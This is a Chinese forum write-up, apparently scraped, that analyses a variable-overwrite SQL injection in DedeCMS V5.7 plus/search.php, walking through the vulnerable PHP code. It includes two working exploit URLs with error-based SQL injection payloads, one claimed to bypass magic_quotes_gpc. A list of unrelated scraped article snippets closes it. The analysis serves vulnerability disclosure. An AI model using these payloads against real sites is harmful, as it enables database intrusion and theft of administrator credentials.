微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.

Hackme论坛原创 转载请附带原文链接

作者: c4rp3nt3r@0x50sec.org

Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

算了不公开了,不能糟蹋0day了.

传送门  DedeCmS V57 plus/search.php 文件SQL注射0day漏洞

黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.

============

Hackme论坛原创 转载请附带原文链接

作者: c4rp3nt3r@0x50sec.org

Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

require_once(dirname(__FILE__).”/../include/common.inc.php”);

require_once(DEDEINC.”/arc.searchview.class.php”);

$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;

$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

if(!isset($orderby)) $orderby=”;

else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);

if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

if(!isset($keyword)){

if(!isset($q)) $q = ”;

$keyword=$q;

}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

//查找栏目信息

if(empty($typeid))

{

$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;

if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )

{

$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

fwrite($fp, “

$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);

$dsql->Execute();

while($row = $dsql->GetArray())

{

fwrite($fp, “/$typeArr[{$row['id']}] = ‘{$row['typename']}’;/r/n”);

}

fwrite($fp, ‘?’.’>’);

fclose($fp);

}

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个

//

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);  //这个地方要绕过

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; // 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设

break;

}

}

}

}

然后plus/search.php文件下面定义了一个 Search类的对象 .

在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.

$this->TypeLink = new TypeLink($typeid);

TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了

… )直接带入了sql语句.

class TypeLink

{

var $typeDir;

var $dsql;

var $TypeID;

var $baseDir;

var $modDir;

var $indexUrl;

var $indexName;

var $TypeInfos;

var $SplitSymbol;

var $valuePosition;

var $valuePositionName;

var $OptionArrayList;

//构造函数///

//php5构造函数

function __construct($typeid)

{

$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];

$this->indexName = $GLOBALS['cfg_indexname'];

$this->baseDir = $GLOBALS['cfg_basedir'];

$this->modDir = $GLOBALS['cfg_templets_dir'];

$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];

$this->dsql = $GLOBALS['dsql'];

$this->TypeID = $typeid;

$this->valuePosition = ”;

$this->valuePositionName = ”;

$this->typeDir = ”;

$this->OptionArrayList = ”;

//载入类目信息

$query = “SELECT tp.*,ch.typename as

ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join

`#@__channeltype` ch

on ch.id=tp.channeltype  WHERE tp.id=’$typeid’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿

if($typeid > 0)

{

$this->TypeInfos = $this->dsql->GetOne($query);

利用代码一 需要 即使magic_quotes_gpc = Off

本帖隐藏的内容

http://www.hackme.info/plus/search.php?typeArr[2%27%20and%20@%60/%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

这只是其中一个利用代码… Search 类的构造函数再往下

……省略

$this->TypeID = $typeid;

……省略

if($this->TypeID==”0″){

$this->ChannelTypeid=1;

}else{

$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲

//现在不鸡肋了吧亲…

$this->ChannelTypeid=$row['channeltype'];

}

利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.

本帖隐藏的内容

http://www.hackme.info/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站.

该文章由WP-AutoPost插件自动采集发布

织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞相关推荐

  1. 有sql漏洞的php脚本,DedeCms V57 plus/search.php 文件SQL注射0day漏洞脚本安全 -电脑资料...

    require_once(dirname(__FILE__)."/../include/common.inc.php"); require_once(DEDEINC."/ ...

  2. flow.php 漏洞,Ecshop 3.0的flow.php文件SQL注射漏洞修复

    关于这个漏洞是ECSHOP2.7.3版本修复了.ecshop最新版本3.0也会犯这种低级的错误. elseif ($_REQUEST['step'] == 'repurchase') { includ ...

  3. 怎样去除织梦版权信息中的Power by DedeCms

    用织梦建站时,网站底部调用的版权信息最后总会多出一个Power by DedeCms链接,此链接是织梦系统中默认的指向织梦官网的外链.本文就介绍两种去除这个外链的方法. 1.为什么要去除Power b ...

  4. 织梦熊掌号插件兼容php5.3,DedeCMS百度熊掌号推送插件下载

    以前做过<DedeCMS实现百度熊掌号API提交接口推送(PHP推送)>和<DedeCMS后台文章管理列表接入百度熊掌号API推送的方法>,里面分别介绍了php方法推送织梦网址 ...

  5. 织梦linux php版本,Linux下安装DedeCMS及安全设置

    Linux下安装DedeCMS及安全设置 织梦无忧 2018-12-09 20:40 摘要: 随着Linux服务器应用范围越来越广泛,国内很多站长也开始使用它作为自己的Web服务器,本篇就来介绍如何在 ...

  6. 织梦5.7生成HTML很慢,Dedecms 生成静态网页速度特别慢的问题

    最近有位站长朋友咨询烈火网一个十几万数据的DedeCMS系统,发现用Dedecms生成速度,慢的跟蜗牛一样,CPU达到100%,有时候半天都不动.本人经过查找在dedecms官网论坛找到个合适的代码, ...

  7. 织梦 tags.php静态化,教你dedecms织梦tag标签页面怎么实现静态化

    大家好,我最近一直在研究织梦的tag页面静态化问题,从网络上看了不少的教程,有的是教你伪静态怎么设置的,有的是利用插件实现真静态的,简单的给大伙分析一下用哪个好. ①伪静态:节约硬盘空间,隐藏文件真实 ...

  8. 武汉php 织梦,给你八分钟搞定dedeCMS(织梦内容管理系统)_PHP教程

    织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历了二年多的发展,目前的版本无论在功能,还是在易用性方面, ...

  9. 最新织梦全国多城市分站地区插件dedecms分站网站源码插件

    织梦城市分站插件系统使用说明 下载链接:http://wp.hrbqunar.com/file/28441143-454501133 1.系统设置: 核心设置-- 是否使用伪静态:是 其他选项-- 模 ...

最新文章

  1. 镇海区工业机器人与自动化设备_镇海区开展首期“工业机器人操作实训班”蓄力智能制造产业发展...
  2. 物理史2000年来最精彩的对决!
  3. /etc/passwd文件小析
  4. python 用途-python中的*和**的用途
  5. android 查看gpio状态_GPIO子系统重要概念
  6. 漫画讲解HDFS原理
  7. [置顶] 完美程序员的10种品质
  8. (原创)无废话C#设计模式之二十二:总结(针对GOF23)
  9. MySQL insert not exists插入唯一数据
  10. 优秀的程序员都应当知道的11个警句
  11. 零基础学python图文版-如何快速创建投票页面 | 腾讯问卷怎么用_什么值得买
  12. 【转】让EntityManager的Query返回Map对象
  13. w ndows平板,Win8.1千元芯平板 昂达V975w四核评测
  14. 后台UI框架bootstrap、JQuery——Hplus-v.4.1.0
  15. 增量式PID公式的4点疑问和理解
  16. matlab瓶盖盖严检查,口服液瓶盖密封性的质量检测方法你知道吗?
  17. Java是什么?Java能干嘛?
  18. PC式硬盘录像机常见故障剖析,监控卡常见问题(一)
  19. 【简单详细】为Unity游戏制作开场动画video,新手必看
  20. 计算机表格要学些什么,刚学电脑,不知道在电脑上怎么制作各种表格, – 手机爱问...

热门文章

  1. 前沿分享|阿里云数据库高级技术专家 宋利兵:阿里云企业级自治数据库RDS详解
  2. 宜搭数字工厂,让订单周期缩减三分之一
  3. 算法专家解读 | 开放搜索教育搜题能力和实践
  4. 阿里云数据库2020技术年报新鲜出炉,全力开启牛年新征程!
  5. 首次公开!阿里巴巴云原生实时数仓核心技术揭秘
  6. 趋势发展之人工智能,入行要趁早
  7. 浅谈游戏视觉包装中的“情感化设计”
  8. “回合制”就是退步?《博德之门3》有话要说
  9. [CF544D]Destroying Roads_最短路_bfs
  10. js/vue 高德地图绘制驾车路线图